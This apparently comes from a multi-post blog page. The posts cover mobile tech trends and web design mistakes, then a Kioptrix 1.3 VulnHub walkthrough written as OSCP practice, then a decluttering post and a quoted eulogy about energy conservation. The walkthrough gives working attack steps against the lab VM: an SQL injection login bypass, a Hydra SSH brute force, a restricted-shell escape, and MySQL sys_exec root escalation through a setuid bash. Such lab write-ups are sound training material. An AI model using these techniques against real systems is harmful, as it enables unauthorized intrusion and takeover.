Mobile Tech: The Past, Present, And Future

Mobile tech is a huge talking point for anyone that loves technology. What we want to do today is take a look at its past, present, and future. What was mobile tech like a decade or so ago? What’s it like now? And, what will it be like in the future? Find all this out here:

Past

In the past, mobile technology was incredibly simple. It was all about creating a device that you can carry around with you to send messages and make calls.

Then, it evolved to a device that allowed you to take pictures and access the internet. In the past, if your phone has internet connectivity, it was seen as something quite remarkable.

Mobile technology was very basic when it first burst on the scene, but things have definitely changed since then, as you will see in the section below.

Present

We’re currently living in a world that is absolutely dominated by mobile technology. The smartphone boom is real, and everyone has at least one mobile device of some sort. Perhaps the key piece of mobile tech right now has to be apps. Mobile apps are huge, they’re useful across so many different industries, and there’s an app for just about anything. It feels like if you have an idea, you just need to find a mobile app company and they can turn that idea into an app. Apps bring people closer to businesses and news outlets because an app sends notifications and provide people with updated information without them having to do anything.

As well as mobile apps we see loads of other tech related things too, such as biometric scanning and incredibly cameras. Most phones now come equipped with fingerprint scanners as an added security measure. Likewise, most mobile devices also have cameras capable of shooting pictures and videos in extremely high-quality resolutions – we’ve even seen a 4k smartphone camera!

To sum up, there are loads of current trends in mobile technology. Apps are huge from a business standpoint, whereas security and cameras are big things from the consumer view. We’re also seeing a few trends that are laying the foundations for future mobile tech, and they’ll be discussed below.

Future

It’s always difficult to predict the future, but we can be fairly certain of a few future mobile tech trends. Most notably; virtual and augmented reality. Mobile devices will soon all be compatible with virtual reality headset, and that will be reflected in the new types of games and apps that are developed.

Similarly, augmented reality will be a huge thing from an app developer standpoint too. We’ve already seen augmented reality games like Pokemon Go be a huge hit. In a few years, most apps will try and integrate augmented reality in some way.

How can we be sure of this? Because there are already a few smartphones and developers that are getting on this trend. Just look at Samsung and their VR headset, or Google and their Google Cardboard.

As you can see, mobile technology has come a long way since its inception. Even though things are very advanced now, it looks like there’s still a very bright future too.

Common Web Design Mistakes You Need To Avoid

The internet has had a massive sway over businesses and creatives trying to make it big for a long time, and this certainly isn’t going to change any time soon! With this in mind, if you haven’t taken a long, hard look at your web strategy for a while, it may be time to change a few things! Despite how accessible and widely practiced it is these days, there are still a lot of web design mistakes many people are making…

Absent or Poor Call to Action

Image: Flickr

If you’re hoping to make any money from your website, and you’re missing a call to action, you can pretty much kiss those aspirations goodbye! This is especially true when it comes to ecommerce websites, where cart abandonment is one of the major causes for these businesses folding. The user checks out your marketing materials, browses your products, fills their shopping cart with the stuff they want, and then just disappear right at the checkout page! You may have done a great job of selling to your target market, but if you’re not telling your customers exactly how to convert, they’re not going to!

Not Keeping Up with Standards

Image: Pixabay

 

Website standards, like a lot of things, are in a constant state of fluctuation. What may be considered professional, relevant and current today has a fair chance of being totally obsolete within a year! Even though it doesn’t have that much to do with how well you run your business, it’s very important to make sure your site is staying up-to-date on aesthetic and interactive design features. One thing that’s going to characterize the foreseeable future is a trend for darker aesthetics and more minimalist graphic design. Aside from that, emerging features such as interactive 360 videos and live broadcasting through companies like Iris live video are quickly gaining popularity, and may well become the standard in the near future. Yes, it’s good to do something to set your website apart. However, before you do that, you should build a foundation by playing ball with whatever current trends are. Fail to do this, and you could seriously harm the air of professionalism your website holds.

Weak SEO

Image: Pixabay

 

You might have the most attractive and functional website to come along for years. However, if no one’s able to find it, it’s not going to be serving its purpose. I’m sorry to tell you this, but there’s no universal formula you can use to ensure you get good search rankings. You’re going to need to find the right balance of keywords, backlinks, title tags and so forth in order to dangle your landing pages in front of your website’s target audience. Set some time aside to assess your current digital marketing efforts, and then set out a plan for improving them if you come across any glaring holes. It may help to outsource the whole issue to a firm like Victorious SEO while you find your footing. Posting high-quality content, fostering social engagement, and improving your standards of keyword research will all make a huge difference.

Kioptrix Level 1.3 (VM #4) Walkthrough

In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.

Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnub.com, and I’ll see if they will add this to Kioptrix 1.3 page soon.

Hopefully, someone will find this useful either way.

It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this writeup outline just one.

Discovery

On my local network, this VM turned up with the IP address of 192.168.0.110.

nmap

Running an nmap scan revealed some open ports and running services:

root@kali:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Poking Around

Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110

No basic SQL injection working from any initial attempts.

Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.

Nikto

Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

dirb and dirsearch

A basic dirb scan turned up a directory:
http://192.168.0.110/john/

I though that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one:
http://192.168.0.110/robert/

Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.

I also ran DIRSEARCH, a python tool that also works well for finding directories and files.
found file: database.sql

(Note: Dirsearch is not included in Kali by default. Requires you to setup Python 3 in a virtual environment to run it.)

enum4linux

Since ports 139 and 445 were being used, I went on try enum4linux

root@kali:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017

<em>(Pasting only the relevant stuff here.)</em>
 ===================================================== 
| Enumerating Workgroup/Domain on 192.168.0.110 |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

============================================= 
| Nbtstat Information for 192.168.0.110 |
 ============================================= 
Looking up status of 192.168.0.110
 KIOPTRIX4 &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service
 KIOPTRIX4 &lt;03&gt; - B &lt;ACTIVE&gt; Messenger Service
 KIOPTRIX4 &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service
 ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections
 WORKGROUP &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

============================== 
| Users on 192.168.0.110 |
 ============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

========================================== 
| Share Enumeration on 192.168.0.110 |
 ========================================== 
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment
 --------- -------
 KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master
 --------- -------
 WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

===================================================== 
| Password Policy Information for 192.168.0.110 |
 ===================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
 File "/usr/bin/polenum", line 33, in &lt;module&gt;
 from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

enum4linux complete on Thu Feb 9 00:40:51 2017

acccheck

I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.

THC Hydra

You can use Hydra to brute force FTP, SSH, POP3, and SMTP account. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:

robert
root
loneferret
john

hydra -L users -P 10_million_password_list_top_100000.txt -t 4 192.168.0.110 ssh -vv

Nothing turned up! Bummer.

database.sql

This was found during discover with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.

Immediately, the first thing to note is that there’s a username and password shown in the dump file.

john
1234

Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck!
I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.

Perhaps it’d work with SSH or SMB?
Negatory

The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.

After a number of failed attempts and errors by trying various SQL injection strings, using this worked:

Username: john
Password: ' OR 1=1 #

That took me to the User Admin Panel and showed the actual password.

That seemed kinda easy. But this is when things got hard, actually.

I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!

Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:

I was warned about trying to cd into the root directory, and getting kicked out if I tried again.

lpath is the same as pwd.

The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile


Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:

Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.

Must break out of the restricted “LigGoat” shell. To the Google!

Searching for “escape restricted shell echo” I found a handy article:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Trying a number of things, I finally found the right trick, which is to use Python to switch shells:

echo os.system("/bin/bash")

That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337

Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.

MySQL

Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the mysql connection string, including the username and password, which were simply:

user: root
pass: (empty)

That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:

Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:

mysql root pwn server

That led me to a Facebook post, of all things:

https://www.facebook.com/notes/security-training-share/mysql-root-to-system-root-with-lib_mysqludf_sys-for-windows-and-linux/865458806817957/

It described the situation perfectly:

“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script (which I was unable to do as user ‘john’ anyway.

Where that article has this line:

select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this instead:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:
bash -p

It should drop you into a root shell!
cd /root

cat congrats.txt
It described the situation perfectly:
"We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often."

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn't need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script that changes users.

Instead of this line:
select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:

  Ø bash -p

It should drop you into a root shell!

cd /root

cat congrats.txt

Root obtained. Mission complete!

 

Decluttering

declutter photoWith the start of a new year about to happen, I’ve been doing a lot of reflection on where I’ve been focusing my attention, and what I’ve been getting out of those things. My conclusions led me to discover that I have been putting a lot of time and energy into things that don’t necessarily help me, my family, and everything surrounding those primary things (career, creativity, cashflow, etc).

So, I have decided to give up the following:

  • Caring about sports. I may watch some bigger Louisville basketball games, but overall, this has become more of a chore than anything, and I spend way too much time wrapped up in the emotions surrounding games. This is particularly unproductive when they lose.
  • Facebook. I’ve given it up before, but it serves absolutely no purpose for me. If people want to keep in touch, they know how to find me.
  • Clash of Clans. I’ve led a very successful clan for almost 2 years, and been a part of the game for almost 3. I helped start the Reddit Alliance Clans system, and all of this has been a large time sink. I did have a lot of fun, and I met a lot of great people along the way, but ultimately, it’s been entirely unproductive towards helping any of the primary things in life I mentioned above.
  • Reddit. One thing I’ve noticed is that by deleting apps off my phone, I waste a lot less time. So I am removing the Reddit app that I use, and will instead only check in on occasion when at my computer, at home. I tend to get wrapped up in drawn-out conversations (or arguments) on Reddit far too often. While some of these interactions can have positive outcomes (discussing network security, for example), most of the time I am arguing with people who will never change their minds. Why? I have no idea.

I hope to start using all the freed up time and energy (in no particular order) towards continuing my newfound interest in working out, continuing to educate myself, investing more time and energy with my family, making more music, and focusing on the things that support all of the above — the primary things in life.

I will report back more in a few months to let you know how it all goes!

Photo by ollesvensson

O, Death

“You want a physicist to speak at your funeral. You want the physicist to talk to your grieving family about the conservation of energy, so they will understand that your energy has not died. You want the physicist to remind your sobbing mother about the first law of thermodynamics; that no energy gets created in the universe, and none is destroyed. You want your mother to know that all your energy, every vibration, every Btu of heat, every wave of every particle that was her beloved child remains with her in this world. You want the physicist to tell your weeping father that amid energies of the cosmos, you gave as good as you got.

And at one point you’d hope that the physicist would step down from the pulpit and walk to your brokenhearted spouse there in the pew and tell him that all the photons that ever bounced off your face, all the particles whose paths were interrupted by your smile, by the touch of your hair, hundreds of trillions of particles, have raced off like children, their ways forever changed by you. And as your widow rocks in the arms of a loving family, may the physicist let her know that all the photons that bounced from you were gathered in the particle detectors that are her eyes, that those photons created within her constellations of electromagnetically charged neurons whose energy will go on forever.

And the physicist will remind the congregation of how much of all our energy is given off as heat. There may be a few fanning themselves with their programs as he says it. And he will tell them that the warmth that flowed through you in life is still here, still part of all that we are, even as we who mourn continue the heat of our own lives.

And you’ll want the physicist to explain to those who loved you that they need not have faith; indeed, they should not have faith. Let them know that they can measure, that scientists have measured precisely the conservation of energy and found it accurate, verifiable and consistent across space and time. You can hope your family will examine the evidence and satisfy themselves that the science is sound and that they’ll be comforted to know your energy’s still around. According to the law of the conservation of energy, not a bit of you is gone; you’re just less orderly. Amen.”

-Aaron Freeman.